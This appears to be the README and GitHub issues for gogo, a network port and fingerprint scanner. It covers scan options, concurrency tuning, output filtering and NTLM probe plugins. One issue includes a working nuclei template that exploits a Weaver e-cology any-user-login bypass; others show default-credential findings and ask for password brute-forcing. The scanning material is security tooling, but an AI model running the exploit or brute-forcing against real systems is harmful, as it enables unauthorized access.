
gogo's Introduction

gogo

Features

  • Flexible port configuration
  • Active and passive fingerprinting
  • Key information extraction, such as title, certificate, and custom regexes for extracting your own information
  • Support for nuclei PoCs; PoC directory: https://chainreactors.github.io/wiki/gogo/detail/#_6
  • Harmless scanning: every added PoC is manually reviewed
  • Controllable heuristic scanning
  • High performance: the fastest possible speed with the smallest possible memory and CPU footprint
  • Minimal-packet principle: send as few packets as possible to obtain the most information
  • DSL support: customize your own gogo through simple configuration
  • Well-designed output handling
  • Almost no third-party dependencies, written in pure native Go; full vulnerability/fingerprint detection works even on Windows 2003

QuickStart

Full documentation and tutorials are in the wiki: https://chainreactors.github.io/wiki/gogo/

Fingerprint and PoC repository: https://github.com/chainreactors/gogo-templates

Minimal usage

Run a default scan against a given subnet and print the results on the command line:

gogo -i 192.168.1.1/24 -p win,db,top2

Port configuration

Some commonly used port configurations:

  • -p - is equivalent to -p 1-65535
  • -p 1-1000 a port range
  • -p common a tag; common means ports commonly used on internal networks
  • -p top2,top3 several tags can be selected at once; these are common external web ports
  • -p all means the union of all preset tags

Multiple configurations are separated by commas and can be combined in all sorts of ways depending on the scenario. For example:

gogo -i 1.1.1.1/24 -p 1-1000,common,http,db

View all port configurations

gogo -P port

lists the ports that correspond to every tag.

当前已有端口配置: (根据端口类型分类)
         top1 :  80,443,8080
         top2 :  70,80,81,82,83,84,85,86,87,88,89,90,443,1080,2000,2001,3000,3001,1443,4443,4430,5000,5001,5601,6000,6001,6002,6003,7000,7001,7002,7003,9000,9001,9002,9003,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8820,6443,8443,9443,8787,7080,8070,7070,7443,9080,9081,9082,9083,5555,6666,7777,7788,9999,6868,8888,8878,8889,7890,5678,6789,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9988,9876,8765,8099,8763,8848,8161,8060,8899,800,801,888,10000,10001,10002,10003,10004,10005,10006,10007,10008,10009,10010,1081,1082,10080,10443,18080,18000,18088,18090,19090,19091,50070
         top3 :  444,9443,6080,6443,9070,9092,9093,7003,7004,7005,7006,7007,7008,7009,7010,7011,9003,9004,9005,9006,9007,9008,9009,9010,9011,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,8161,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8880,8881,8882,8883,8884,8885,8886,8887,8888,8889,8890,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8180,8181,8983,1311,8363,8800,8761,8873,8866,8900,8282,8999,8989,8066,8200,8040,8060,10800,18081
         docker :  2375,2376,2377,2378,2379,2380
         lotus :  1352
         dubbo :  18086,20880,20881,20882
         oracle :  1158,1521,11521,210
         ...
         ...
         ...

Heuristic scanning

When the target range's subnet mask is shorter than /24, enabling smart mode scanning is recommended (see the docs for how it works); for example with a /16 (the output is large, so enable --af to write results to a file and print only logs on the command line):

gogo -i 172.16.1.1/12 -m ss --ping -p top2,win,db --af

--af means the output filename is generated automatically.

-m ss means scanning in supersmart mode. Other modes, such as sc, suit different scenarios.

--ping means checking whether an IP responds to ping before fingerprinting/information gathering, to reduce useless packets. Note that a host that does not respond to ping is not necessarily down; keep this in mind when using the option.

workflow

The heuristic scan commands are a bit complex, but a workflow lets you write a complex command into a configuration file and invoke it quickly (see the docs for details of the built-in workflows).

gogo -w 172

gives exactly the same configuration as gogo -i 172.16.1.1/12 -m ss --ping -p top2,win,db --af

View all workflows

gogo -P workflow

Commonly used configurations are already built into workflows; for example, to scan the 10.x internal range in supersmart mode, gogo -w 10 is enough.

There are also some reserved configurations (other options are filled in but no target, so the target must be specified manually with -i), for example:

gogo -w ss -i 11.0.0.0/8

Preset parameters in a workflow have lower priority than command-line input, so workflow parameters can be overridden from the command line. For example:

gogo -w 10 -i 11.0.0.0/8

Examples

A simple task

gogo -i 81.68.175.32/28 -p top2

gogo -i 81.68.175.32/28 -p top2
[*] Current goroutines: 1000, Version Level: 0,Exploit Target: none, PortSpray: false ,2022-07-07 07:07.07
[*] Start task 81.68.175.32/28 ,total ports: 100 , mod: default ,2022-07-07 07:07.07
[*] ports: 80,81,82,83,84,85,86,87,88,89,90,443,1080,2000,2001,3000,3001,4443,4430,5000,5001,5601,6000,6001,6002,6003,7000,7001,7002,7003,9000,9001,9002,9003,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,6443,8443,9443,8787,7080,8070,7070,7443,9080,9081,9082,9083,5555,6666,7777,9999,6868,8888,8889,9090,9091,8091,8099,8763,8848,8161,8060,8899,800,801,888,10000,10001,10080 ,2022-07-07 07:07.07
[*] Scan task time is about 8 seconds ,2022-07-07 07:07.07
[+] http://81.68.175.33:80      nginx/1.16.0            nginx                   bd37 [200] HTTP/1.1 200
[+] http://81.68.175.32:80      nginx/1.18.0 (Ubuntu)           nginx                   8849 [200] Welcome to nginx!
[+] http://81.68.175.34:80      nginx           宝塔||nginx                     f0fa [200] 没有找到站点
[+] http://81.68.175.34:8888    nginx           nginx                   d41d [403] HTTP/1.1 403
[+] http://81.68.175.34:3001    nginx           webpack||nginx                  4a9b [200] shop_mall
[+] http://81.68.175.37:80      Microsoft-IIS/10.0              iis10                   c80f [200] HTTP/1.1 200             c0f6 [200] 安全入口校验失败
[*] Alive sum: 5, Target sum : 1594 ,2022-07-07 07:07.07
[*] Totally run: 4.0441884s ,2022-07-07 07:07.07

To chain gogo with other tools, specify -q/--quiet to turn off log messages and keep only the results.

Output and post-processing

For input, output and various advanced usages, see the output wiki.

If you run gogo -i 81.68.175.1 --af

after the scan completes you will find, in the same directory as the gogo binary, a generated file .81.68.175.1_28_all_default_json.dat1; this file is deflate-compressed JSON.

Format the file with gogo to get human-readable results:

 gogo  -F .\.81.68.175.1_28_all_default_json.dat1
Scan Target: 81.68.175.1/28, Ports: all, Mod: default
Exploit: none, Version level: 0

[+] 81.68.175.32
        http://81.68.175.32:80  nginx/1.18.0 (Ubuntu)           nginx                   8849 [200] Welcome to nginx!
        tcp://81.68.175.32:22                   *ssh                     [tcp]
        tcp://81.68.175.32:389                                           [tcp]
[+] 81.68.175.33
        tcp://81.68.175.33:3306                 *mysql                   [tcp]
        tcp://81.68.175.33:22                   *ssh                     [tcp]
        http://81.68.175.33:80  nginx/1.16.0            nginx                   bd37 [200] HTTP/1.1 200
[+] 81.68.175.34
        tcp://81.68.175.34:3306                 mysql 5.6.50-log                         [tcp]
        tcp://81.68.175.34:21                   ftp                      [tcp]
        tcp://81.68.175.34:22                   *ssh                     [tcp]
        http://81.68.175.34:80  nginx           宝塔||nginx                     f0fa [200] 没有找到站点
        http://81.68.175.34:8888        nginx           nginx                   d41d [403] HTTP/1.1 403
        http://81.68.175.34:3001        nginx           webpack||nginx                  4a9b [200] shop_mall
[+] 81.68.175.35
        http://81.68.175.35:47001       Microsoft-HTTPAPI/2.0           microsoft-httpapi                       e702 [404] Not Found
[+] 81.68.175.36
        http://81.68.175.36:80  nginx   PHP     nginx                   babe [200] 风闻客栈24小时发卡中心 - 风闻客栈24小时发卡中心
        tcp://81.68.175.36:22                   *ssh                     [tcp]
...
...

Exporting to other tools

Some commonly used output formats:

  • -o full the default output format, as shown in the example above
  • -o color full output with colours. Since v2.11.0 this is enabled by default when -F prints to the command line; to turn it off, specify -o full manually
  • -o jl one JSON object per line, which can be piped to jq for real-time processing
  • -o json one large JSON file
  • -o url output URLs only, usually used with -F

All output formats: https://chainreactors.github.io/wiki/gogo/start/#_4

Output filters

The --filter option filters the specified data out of a dat file and outputs it.

For example, to filter on a field value: gogo -F 1.dat --filter framework::redis -o target filters the redis targets out of 1.dat and outputs the target field.

Here :: means fuzzy match. Three other operators exist: == for exact match, != for not equal, and !: for does not contain.

-F 1.json -f file writes the result to a file again; -F 1.dat --af automatically generates a filename for the formatted output.
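The four filter operators above, applied to jl-style records, look like this. This is an added example, not gogo's own filter implementation; the record field names (target, protocol, framework, title) and the three sample lines are constructed, and all values are kept as strings so one decoder serves every record.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Filter is one --filter expression split into field, operator and value.
type Filter struct {
	Field, Op, Value string
}

// ParseFilter splits "framework::redis" into its parts. The operator chosen is
// the one that occurs earliest, so a value containing "::" or "==" after a
// different operator is not mis-split.
func ParseFilter(expr string) (Filter, error) {
	best := Filter{}
	pos := -1
	for _, op := range []string{"::", "==", "!=", "!:"} {
		if i := strings.Index(expr, op); i > 0 && (pos < 0 || i < pos) {
			pos = i
			best = Filter{Field: expr[:i], Op: op, Value: expr[i+len(op):]}
		}
	}
	if pos < 0 {
		return Filter{}, fmt.Errorf("no operator in %q", expr)
	}
	return best, nil
}

// Match applies the operator to one record field (a missing field reads as "").
func (f Filter) Match(rec map[string]string) bool {
	v := rec[f.Field]
	switch f.Op {
	case "::": // fuzzy: substring match
		return strings.Contains(v, f.Value)
	case "==": // exact
		return v == f.Value
	case "!=": // not equal
		return v != f.Value
	case "!:": // does not contain
		return !strings.Contains(v, f.Value)
	}
	return false
}

// FilterJSONLines decodes one JSON object per line (the -o jl shape), keeps the
// records matching expr, and returns the requested output field of each.
func FilterJSONLines(jl, expr, outField string) ([]string, error) {
	f, err := ParseFilter(expr)
	if err != nil {
		return nil, err
	}
	var out []string
	for _, line := range strings.Split(strings.TrimSpace(jl), "\n") {
		if line == "" {
			continue
		}
		var rec map[string]string
		if err := json.Unmarshal([]byte(line), &rec); err != nil {
			return nil, fmt.Errorf("bad record %q: %v", line, err)
		}
		if f.Match(rec) {
			out = append(out, rec[outField])
		}
	}
	return out, nil
}

// sampleJL is constructed; the field names are assumptions, not gogo's schema.
const sampleJL = `
{"target":"10.0.0.5:6379","protocol":"tcp","framework":"redis","title":""}
{"target":"10.0.0.6:80","protocol":"http","framework":"nginx","title":"Welcome to nginx!"}
{"target":"10.0.0.7:6380","protocol":"tcp","framework":"redis-sentinel","title":""}
`
```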

Notes

  • (Important) Because the concurrency is very high, routing and switching equipment may be harmed; for example, some home routers may crash, reboot or overheat under high concurrency. For external-network scans, run gogo on a VPS such as Alibaba Cloud or Huawei Cloud; for assets outside China, use a VPS abroad. Running locally on poorly performing network equipment causes heavy packet loss. For internal-network scans, adjust the concurrency to the actual situation.
  • If you see a flood of errors, it is most likely an I/O problem (for example, I/O not being released correctly after repeated scans, or errors when used together with proxifier or similar proxy tools); rebooting the machine, running inside a VM, or closing the proxy tool resolves it. If that does not help, contact us.
  • Also note that although the upx-compressed build is smaller, it may be flagged by antivirus software and may fail to run on some machines.
  • It generally cannot be used in a proxied environment unless a lower rate is specified with the -t option (the default concurrency is 4000).
  • gogo itself has no offensive capability and cannot exploit any vulnerability.
  • Make sure you have authorization before using gogo; gogo opposes all illegal hacking activity.

Recommended concurrency per scenario

The default concurrency is 4000 on Linux and 1000 on Windows, which is usable in enterprise network environments; in weak network environments (home, mobile base stations, etc.) it may cause a network DoS.

Set the concurrency manually with the -t option according to the environment:

  • Behind a home router (e.g. phishing, physical access, scanning from a local machine): recommended concurrency 100-500
  • Linux production network environment (e.g. a foothold obtained through an external web breach): default concurrency 4000, no manual change needed
  • Windows production network environment: default concurrency 1000, no manual change needed
  • UDP protocols miss many results under high concurrency, for example when gathering NetBIOS information; re-probe UDP protocols separately at lower concurrency
  • Web forward proxies (e.g. regeorg): recommended concurrency 10-30
  • Reverse proxies (e.g. frp): recommended concurrency 10-100

If a large number of results are missed, the network is most likely congested, causing latency to rise above the timeout.

You can therefore also raise the timeout with -d 5 (the TCP default is 2s; the TLS default is twice the TCP timeout, i.e. 4s) to reduce missed results.

Auto-tune, which adjusts the concurrency rate automatically, may be implemented in the future.

These usages cover less than half of the use cases; please read the documentation.

Make

Manual build

# download
git clone --recurse-submodules https://github.com/chainreactors/gogo
cd gogo/v2

# sync dependency
go mod tidy   

# generate template.go
# Note: to build a Windows 2003-compatible binary with go1.10, you still need to run go generate with a newer Go first to generate the dependencies
go generate  

# build 
go build .

# windows server 2003 compile
GOOS=windows GOARCH=386 go1.10 build .

# go1.10 has no go mod yet, so dependency errors may occur. If they do, build with go1.11 instead.
# go1.11 officially does not support Windows Server 2003, but in practice it runs stably (lower the concurrency).
GOOS=windows GOARCH=386 go1.11 build .

To build for Windows XP/2003, generate the templates with a newer Go first, then build with Go 1.11.

Similar or related works

  • ServerScan an early, simple scanner; limited features, but it opened up the idea
  • fscan a simple and crude scanner with quite a few rough edges, but it wins on simplicity; its straightforward command line inspired the workflow feature
  • kscan a full-featured scanner; some of its fingerprints were selected and merged
  • ladongo integrates many common functions; information gathering for several special ports was learned from it
  • cube similar to fscan; NTLM-related protocol information gathering was learned from it

gogo improves itself by drawing on these similar works. Thanks to those who came before.

For a detailed comparison, see the documentation.

THANKS

Contributors

m09ic, passingfoam


gogo's Issues

IP matching is incomplete

sudo ./gogo -i 172.16.0.0-253
[warn] System fd limit: 2560 , Please exec 'ulimit -n 65535' 
[warn] Now set threads to 2460 
[warn] Parse Ip Failed, skipped, Unable to resolve domain name:172.16.0.0-253. SKIPPED! 
[-] all targets format error

or

sudo ./gogo -i 172.16.0.0-172.31.254.254                            
[warn] System fd limit: 2560 , Please exec 'ulimit -n 65535' 
[warn] Now set threads to 2460 
[warn] Parse Ip Failed, skipped, Unable to resolve domain name:172.16.0.0-172.31.254.254. SKIPPED! 
[-] all targets format error

A small suggestion: you could just reuse Fscan's IP-matching approach ❤️

IP input feature

It would be nice to support inputs like 192.168.35.25-35

Would you consider adding NTLM probing based on MSSQL and WinRM?

After all, WMI and SMB are not always open.
mssql:

package plugin

import (
	"bytes"

	"github.com/M09ic/go-ntlmssp"
	. "github.com/chainreactors/gogo/v2/pkg"
	"github.com/chainreactors/utils/iutils"
)

// mssqlScan sends a TDS PRELOGIN, then a LOGIN7 carrying an NTLM NEGOTIATE,
// and extracts host/domain details from the NTLM CHALLENGE the server returns.
func mssqlScan(result *Result) {
	result.Port = "1433"
	target := result.GetTarget()
	conn, err := NewSocket("tcp", target, RunOpt.Delay)
	if err != nil {
		return
	}
	defer conn.Close()
	_, err = conn.Request(prelogin, 4096)
	if err != nil {
		return
	}

	r2, err := conn.Request(SSPI_Message, 4096)
	if err != nil {
		return
	}
	result.Open = true
	result.Status = "mssql"
	result.Protocol = "mssql"
	// Locate the NTLM CHALLENGE inside the TDS response; bail out if it is
	// absent rather than slicing with a negative offset.
	off_ntlm := bytes.Index(r2, []byte("NTLMSSP"))
	if off_ntlm < 0 {
		return
	}
	data := r2[off_ntlm:]
	if result.Title == "" {
		result.AddNTLMInfo(iutils.ToStringMap(ntlmssp.NTLMInfo(data)), "mssql")
	}
}

var prelogin = []byte{
	0x12, 0x01, 0x00, 0x58, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x06, 0x01, 0x00, 0x25,
	0x00, 0x01, 0x02, 0x00, 0x26, 0x00, 0x01, 0x03, 0x00, 0x27, 0x00, 0x04, 0x04, 0x00, 0x2b, 0x00,
	0x01, 0x05, 0x00, 0x2c, 0x00, 0x24, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}

var SSPI_Message = []byte{
	0x10, 0x01, 0x01, 0xb3, 0x00, 0x00, 0x01, 0x00, 0xab, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x74,
	0x40, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x2a, 0x2a, 0x2a, 0x2a, 0x00, 0x00, 0x00, 0x00,
	0xe0, 0x83, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x21, 0x00, 0xb2, 0x00, 0x0e, 0x00,
	0xce, 0x00, 0x04, 0x00, 0xd2, 0x00, 0x21, 0x00, 0x14, 0x01, 0x00, 0x00, 0x14, 0x01, 0x07, 0x00,
	0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x22, 0x01, 0x7e, 0x00, 0xa0, 0x01, 0x00, 0x00, 0xa0, 0x01,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x4e, 0x00, 0x4f, 0x00, 0x4e, 0x00, 0x59, 0x00,
	0x4d, 0x00, 0x4f, 0x00, 0x55, 0x00, 0x53, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x65, 0x00,
	0x20, 0x00, 0x2e, 0x00, 0x4e, 0x00, 0x65, 0x00, 0x74, 0x00, 0x20, 0x00, 0x53, 0x00, 0x71, 0x00,
	0x6c, 0x00, 0x43, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00,
	0x44, 0x00, 0x61, 0x00, 0x74, 0x00, 0x61, 0x00, 0x20, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00,
	0x76, 0x00, 0x69, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x31, 0x00, 0x30, 0x00, 0x2e, 0x00,
	0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x32, 0x00, 0x31, 0x00, 0x35, 0x00, 0x2e, 0x00,
	0x31, 0x00, 0x30, 0x00, 0x38, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00,
	0x65, 0x00, 0x20, 0x00, 0x2e, 0x00, 0x4e, 0x00, 0x65, 0x00, 0x74, 0x00, 0x20, 0x00, 0x53, 0x00,
	0x71, 0x00, 0x6c, 0x00, 0x43, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00,
	0x20, 0x00, 0x44, 0x00, 0x61, 0x00, 0x74, 0x00, 0x61, 0x00, 0x20, 0x00, 0x50, 0x00, 0x72, 0x00,
	0x6f, 0x00, 0x76, 0x00, 0x69, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x54, 0x00, 0x64, 0x00,
	0x73, 0x00, 0x54, 0x00, 0x65, 0x00, 0x73, 0x00, 0x74, 0x00, 0x60, 0x7c, 0x06, 0x06, 0x2b, 0x06,
	0x01, 0x05, 0x05, 0x02, 0xa0, 0x72, 0x30, 0x70, 0xa0, 0x30, 0x30, 0x2e, 0x06, 0x0a, 0x2b, 0x06,
	0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x82, 0xf7, 0x12,
	0x01, 0x02, 0x02, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x0a,
	0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1e, 0xa2, 0x3c, 0x04, 0x3a, 0x4e, 0x54,
	0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb7, 0xb2, 0x08, 0xe2, 0x09, 0x00,
	0x09, 0x00, 0x31, 0x00, 0x00, 0x00, 0x09, 0x00, 0x09, 0x00, 0x28, 0x00, 0x00, 0x00, 0x0a, 0x00,
	0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f, 0x41, 0x4e, 0x4f, 0x4e, 0x59, 0x4d, 0x4f, 0x55, 0x53, 0x57,
	0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, 0x55, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00,
	0x00, 0x00, 0xff,
}

winrm:

package plugin

import (
	"encoding/base64"
	"fmt"
	"net/http"
	"strings"
	"time"

	"github.com/M09ic/go-ntlmssp"
	. "github.com/chainreactors/gogo/v2/pkg"
	"github.com/chainreactors/utils/iutils"
)

// winrmScan posts an NTLM NEGOTIATE to /wsman and decodes the NTLM CHALLENGE
// returned in the WWW-Authenticate header.
func winrmScan(result *Result) {
	result.Port = "5985"
	target := result.GetTarget()
	uri := fmt.Sprintf("http://%s/wsman", target)
	clt := http.Client{Timeout: 3 * time.Second}
	req, err := http.NewRequest("POST", uri, nil)
	if err != nil {
		return
	}
	req.Header.Add("Content-Length", "0")
	req.Header.Add("Keep-Alive", "true")
	req.Header.Add("Content-Type", "application/soap+xml;charset=UTF-8")
	req.Header.Add("User-Agent", "Microsoft WinRM Client")
	// Base64-encoded NTLM NEGOTIATE (type 1) message.
	req.Header.Add("Authorization", "Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==")
	resp, err := clt.Do(req)
	if err != nil {
		result.Protocol = "tcp"
		result.Status = "tcp"
		return
	}
	defer resp.Body.Close()
	// Expect "Negotiate <base64 CHALLENGE>"; check the prefix so a missing or
	// short header does not panic on the slice.
	const prefix = "Negotiate "
	auth := resp.Header.Get("Www-Authenticate")
	if !strings.HasPrefix(auth, prefix) || len(auth) == len(prefix) {
		result.Protocol = "tcp"
		result.Status = "tcp"
		return
	}
	data, err := base64.StdEncoding.DecodeString(auth[len(prefix):])
	if err != nil {
		result.Protocol = "tcp"
		result.Status = "tcp"
		return
	}
	result.Status = "winrm"
	result.Open = true
	result.Protocol = "winrm"
	result.AddNTLMInfo(iutils.ToStringMap(ntlmssp.NTLMInfo(data)), "winrm")
}

Any news on this, zombie?

Hi, as things stand, password brute-forcing is unavoidable; there are of course several ways to solve this, but in practice I still hope ssh and other password brute-forcing can be integrated, controlled by a parameter.

Unable to extract the sessionkey intermediate variable

id: ecology-VerifyQuickLogin-any-user-login

info:
  name: ecology-VerifyQuickLogin-any-user-login
  severity: critical
  tags: "泛微 weaver"

requests:
  - raw:
      - |
        POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        identifier=1&language=1&ipaddress=1.1.1.1

      - |
        POST /mobile/plugin/plus/login/LoingFromEb.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        loginkey={{session}}

    req-condition: true
    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: session
        regex:
          - 'sessionkey":"(.*)"'

    matchers:
      - type: word
        part: body
        words:
          - "RedirectFile=/wui/main.jsp"

After a scan task is stopped midway, the result file cannot be viewed?

I stopped a C-class scan midway and wanted to see the results, but it says

# ./gogo -F .10.8.0.2.24_20-65535_default_jl.dat --filter title!=
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
Killed

Is there a fix for this?

Whitelist feature not taking effect

The --exclude and --exclude-file options do not take effect; I added the IPs to exclude on the command line, but they were still scanned.
./gogo_linux_amd64 --ip=172.22.1.1/16 -w snoping --exclude=172.22.235.41/24 --af

Also, the subnet masks shown during liveness detection are not standardized; could the output default to something like 1/24, so it is easier to handle when excluding via the whitelist?
Currently the detected ranges look like 172.22.216.41/24, which may not map accurately and quickly.

Suspected bug

An issue I found during testing
./gogo -i x.x.x.x -p 8848 --exploit-name=nacos-default-login produces vulnerability output
[+] http://x.x.x.126:8848 [200] Nacos [ high: nacos-default-login payloads: password:nacos username:nacos ]

but ./gogo -i x.x.x.126 -p 8848 -ev produces no vulnerability output; in other words, output only appears when the vulnerability is specified explicitly. I have not yet found the cause; if you need the target IP for testing, please contact me.

Question

On Windows, when not using --af, the output has no colour; can this be fixed?
I would like the info output in blue text, as on Linux.

Proposal

Could fingerprint rules like this be added?
This is the fofa query body="lui_login_message_td" && body="form_bottom"
I tried adding "lui_login_message_td"&&"form_bottom" in gogo and got an error at generation time; or is there another way?

Reading scan results with -F hangs

The file is 81 MB and cannot be viewed at all on the server; after pulling it to my local machine I get just the two lines below, with no other output, and it hangs forever. Does that mean nothing was found?

# ./gogo -F .192.168.19.0.24_20-65535_default_jl.dat 
Killed

Could URL-based fingerprinting with nuclei integration be supported?

Hi, gogo currently focuses on internal-network scenarios, but the code's active and passive fingerprinting of web services and its nuclei integration for vulnerability scanning are similar to, and overlap with, external-network footholding. Could an external-network mode be added, taking URLs as input, performing active and passive fingerprinting, and then running a nuclei tag scan?

New version errors on startup

./gogo: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./gogo)
./gogo: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./gogo)

gogo-neutron template parsing error

https://github.com/chainreactors/neutron/blob/master/templates_gogo/impl.go lines 25 and 31 have a bug: taking a pointer inside the loop makes every path in requests point to the last path:

e.g. with the following PoC, the /bbb/ path is requested twice

id: test
info:
  name: test
  severity: info
  tags: http

http:
  - method: GET
    path:
      - "{{BaseURL}}/aaa/"

    matchers:
      - type: word
        part: body
        words:
          - 'refresh'

  - method: GET
    path:
      - "{{BaseURL}}/bbb/"

    matchers:
      - type: word
        part: body
        words:
          - 'Found'
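The aliasing the issue describes, reproduced and fixed side by side. This is an added example, not neutron's code: Request is a constructed stand-in for one template request, and the two-path list mirrors the PoC above. Note that since Go 1.22 the range variable is fresh per iteration, so the idiomatic `for _, req := range` form no longer aliases; the explicit reused variable below reproduces the pre-1.22 behaviour in any Go version.

```go
package main

// Request is a minimal stand-in for one entry of a template's request list.
type Request struct {
	Method string
	Path   string
}

// collectBuggy reproduces the aliasing bug: one variable is reused for every
// iteration and its address is stored each time, so every stored pointer
// refers to the same memory, which ends up holding the last element.
func collectBuggy(reqs []Request) []*Request {
	var out []*Request
	var req Request
	for i := range reqs {
		req = reqs[i]
		out = append(out, &req)
	}
	return out
}

// collectFixed takes the address of each slice element itself, so every
// stored pointer keeps its own request.
func collectFixed(reqs []Request) []*Request {
	var out []*Request
	for i := range reqs {
		out = append(out, &reqs[i])
	}
	return out
}

// plannedPaths lists the path each collected request would actually be sent to.
func plannedPaths(reqs []*Request) []string {
	paths := make([]string, 0, len(reqs))
	for _, r := range reqs {
		paths = append(paths, r.Path)
	}
	return paths
}

// pocRequests is a constructed two-request list like the PoC in the issue.
var pocRequests = []Request{
	{Method: "GET", Path: "{{BaseURL}}/aaa/"},
	{Method: "GET", Path: "{{BaseURL}}/bbb/"},
}

// BuggyPaths and FixedPaths expose the two outcomes for comparison.
func BuggyPaths() []string { return plannedPaths(collectBuggy(pocRequests)) }
func FixedPaths() []string { return plannedPaths(collectFixed(pocRequests)) }
```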

Windows Server 2008 R2 ERROR

Windows Server 2008 R2, Windows 7 and older versions all report errors

Exception 0xc0000005 0x8 0x0 0x0
PC=0x0

runtime.asmstdcall()
$GOROOT/src/runtime/sys_windows_amd64.s:65 +0x75 fp=0xb2f9e0 sp=0xb2f9c0 pc=0x1591f5

About the body MD5 match

Some fingerprints need to match the MD5 of the body; in v2/pkg/fingers/fingers.go the match is against the MD5 of the whole response content. Matching the body would be better.

for _, md5s := range r.Regexps.MD5 {
	if md5s == parsers.Md5Hash([]byte(content)) {
		logs.Log.Debugf("%s finger hit, md5: %s", r.FingerName, md5s)
		return true, false, ""
	}
}

The date and server fields in the response are highly random, so the MD5 cannot be matched.
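Hashing only the body, as the issue asks, makes the fingerprint stable across the volatile Date and Server headers. This is an added example, not the project's fingers.go code: rawResponse builds constructed captures of the same page with different headers, and BodyMD5 uses net/http's response parser to separate the body before hashing.

```go
package main

import (
	"bufio"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"io"
	"net/http"
	"strings"
)

func md5Hex(b []byte) string {
	sum := md5.Sum(b)
	return hex.EncodeToString(sum[:])
}

// ContentMD5 hashes the whole raw response, headers included, which is what
// hashing the full content amounts to and why the match is unstable.
func ContentMD5(raw string) string {
	return md5Hex([]byte(raw))
}

// BodyMD5 parses the raw response and hashes only the body, so volatile headers
// such as Date and Server no longer influence the fingerprint.
func BodyMD5(raw string) (string, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	return md5Hex(body), nil
}

// rawResponse builds a constructed HTTP/1.1 response with the given Date and
// Server headers around body; Content-Length is computed so the parser reads
// exactly the body.
func rawResponse(date, server, body string) string {
	return fmt.Sprintf("HTTP/1.1 200 OK\r\nDate: %s\r\nServer: %s\r\n"+
		"Content-Type: text/html\r\nContent-Length: %d\r\n\r\n%s",
		date, server, len(body), body)
}

// Constructed captures of the same page taken from two servers at different times.
const pageBody = "<html><title>gogo</title></html>"

var (
	captureA = rawResponse("Mon, 01 Jan 2024 00:00:00 GMT", "nginx/1.16.0", pageBody)
	captureB = rawResponse("Tue, 02 Jan 2024 12:34:56 GMT", "nginx/1.18.0", pageBody)
)
```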

No file generated on macOS

On macOS, after a gogo scan finishes, neither forcing an output file nor automatic file output produces a file on disk.
./gogo_darwin_amd64 -i 192.168.0.1/24 --af does write a file, but ./gogo_darwin_amd64 -i 192.168.0.1/24 -f 1.dat does not.
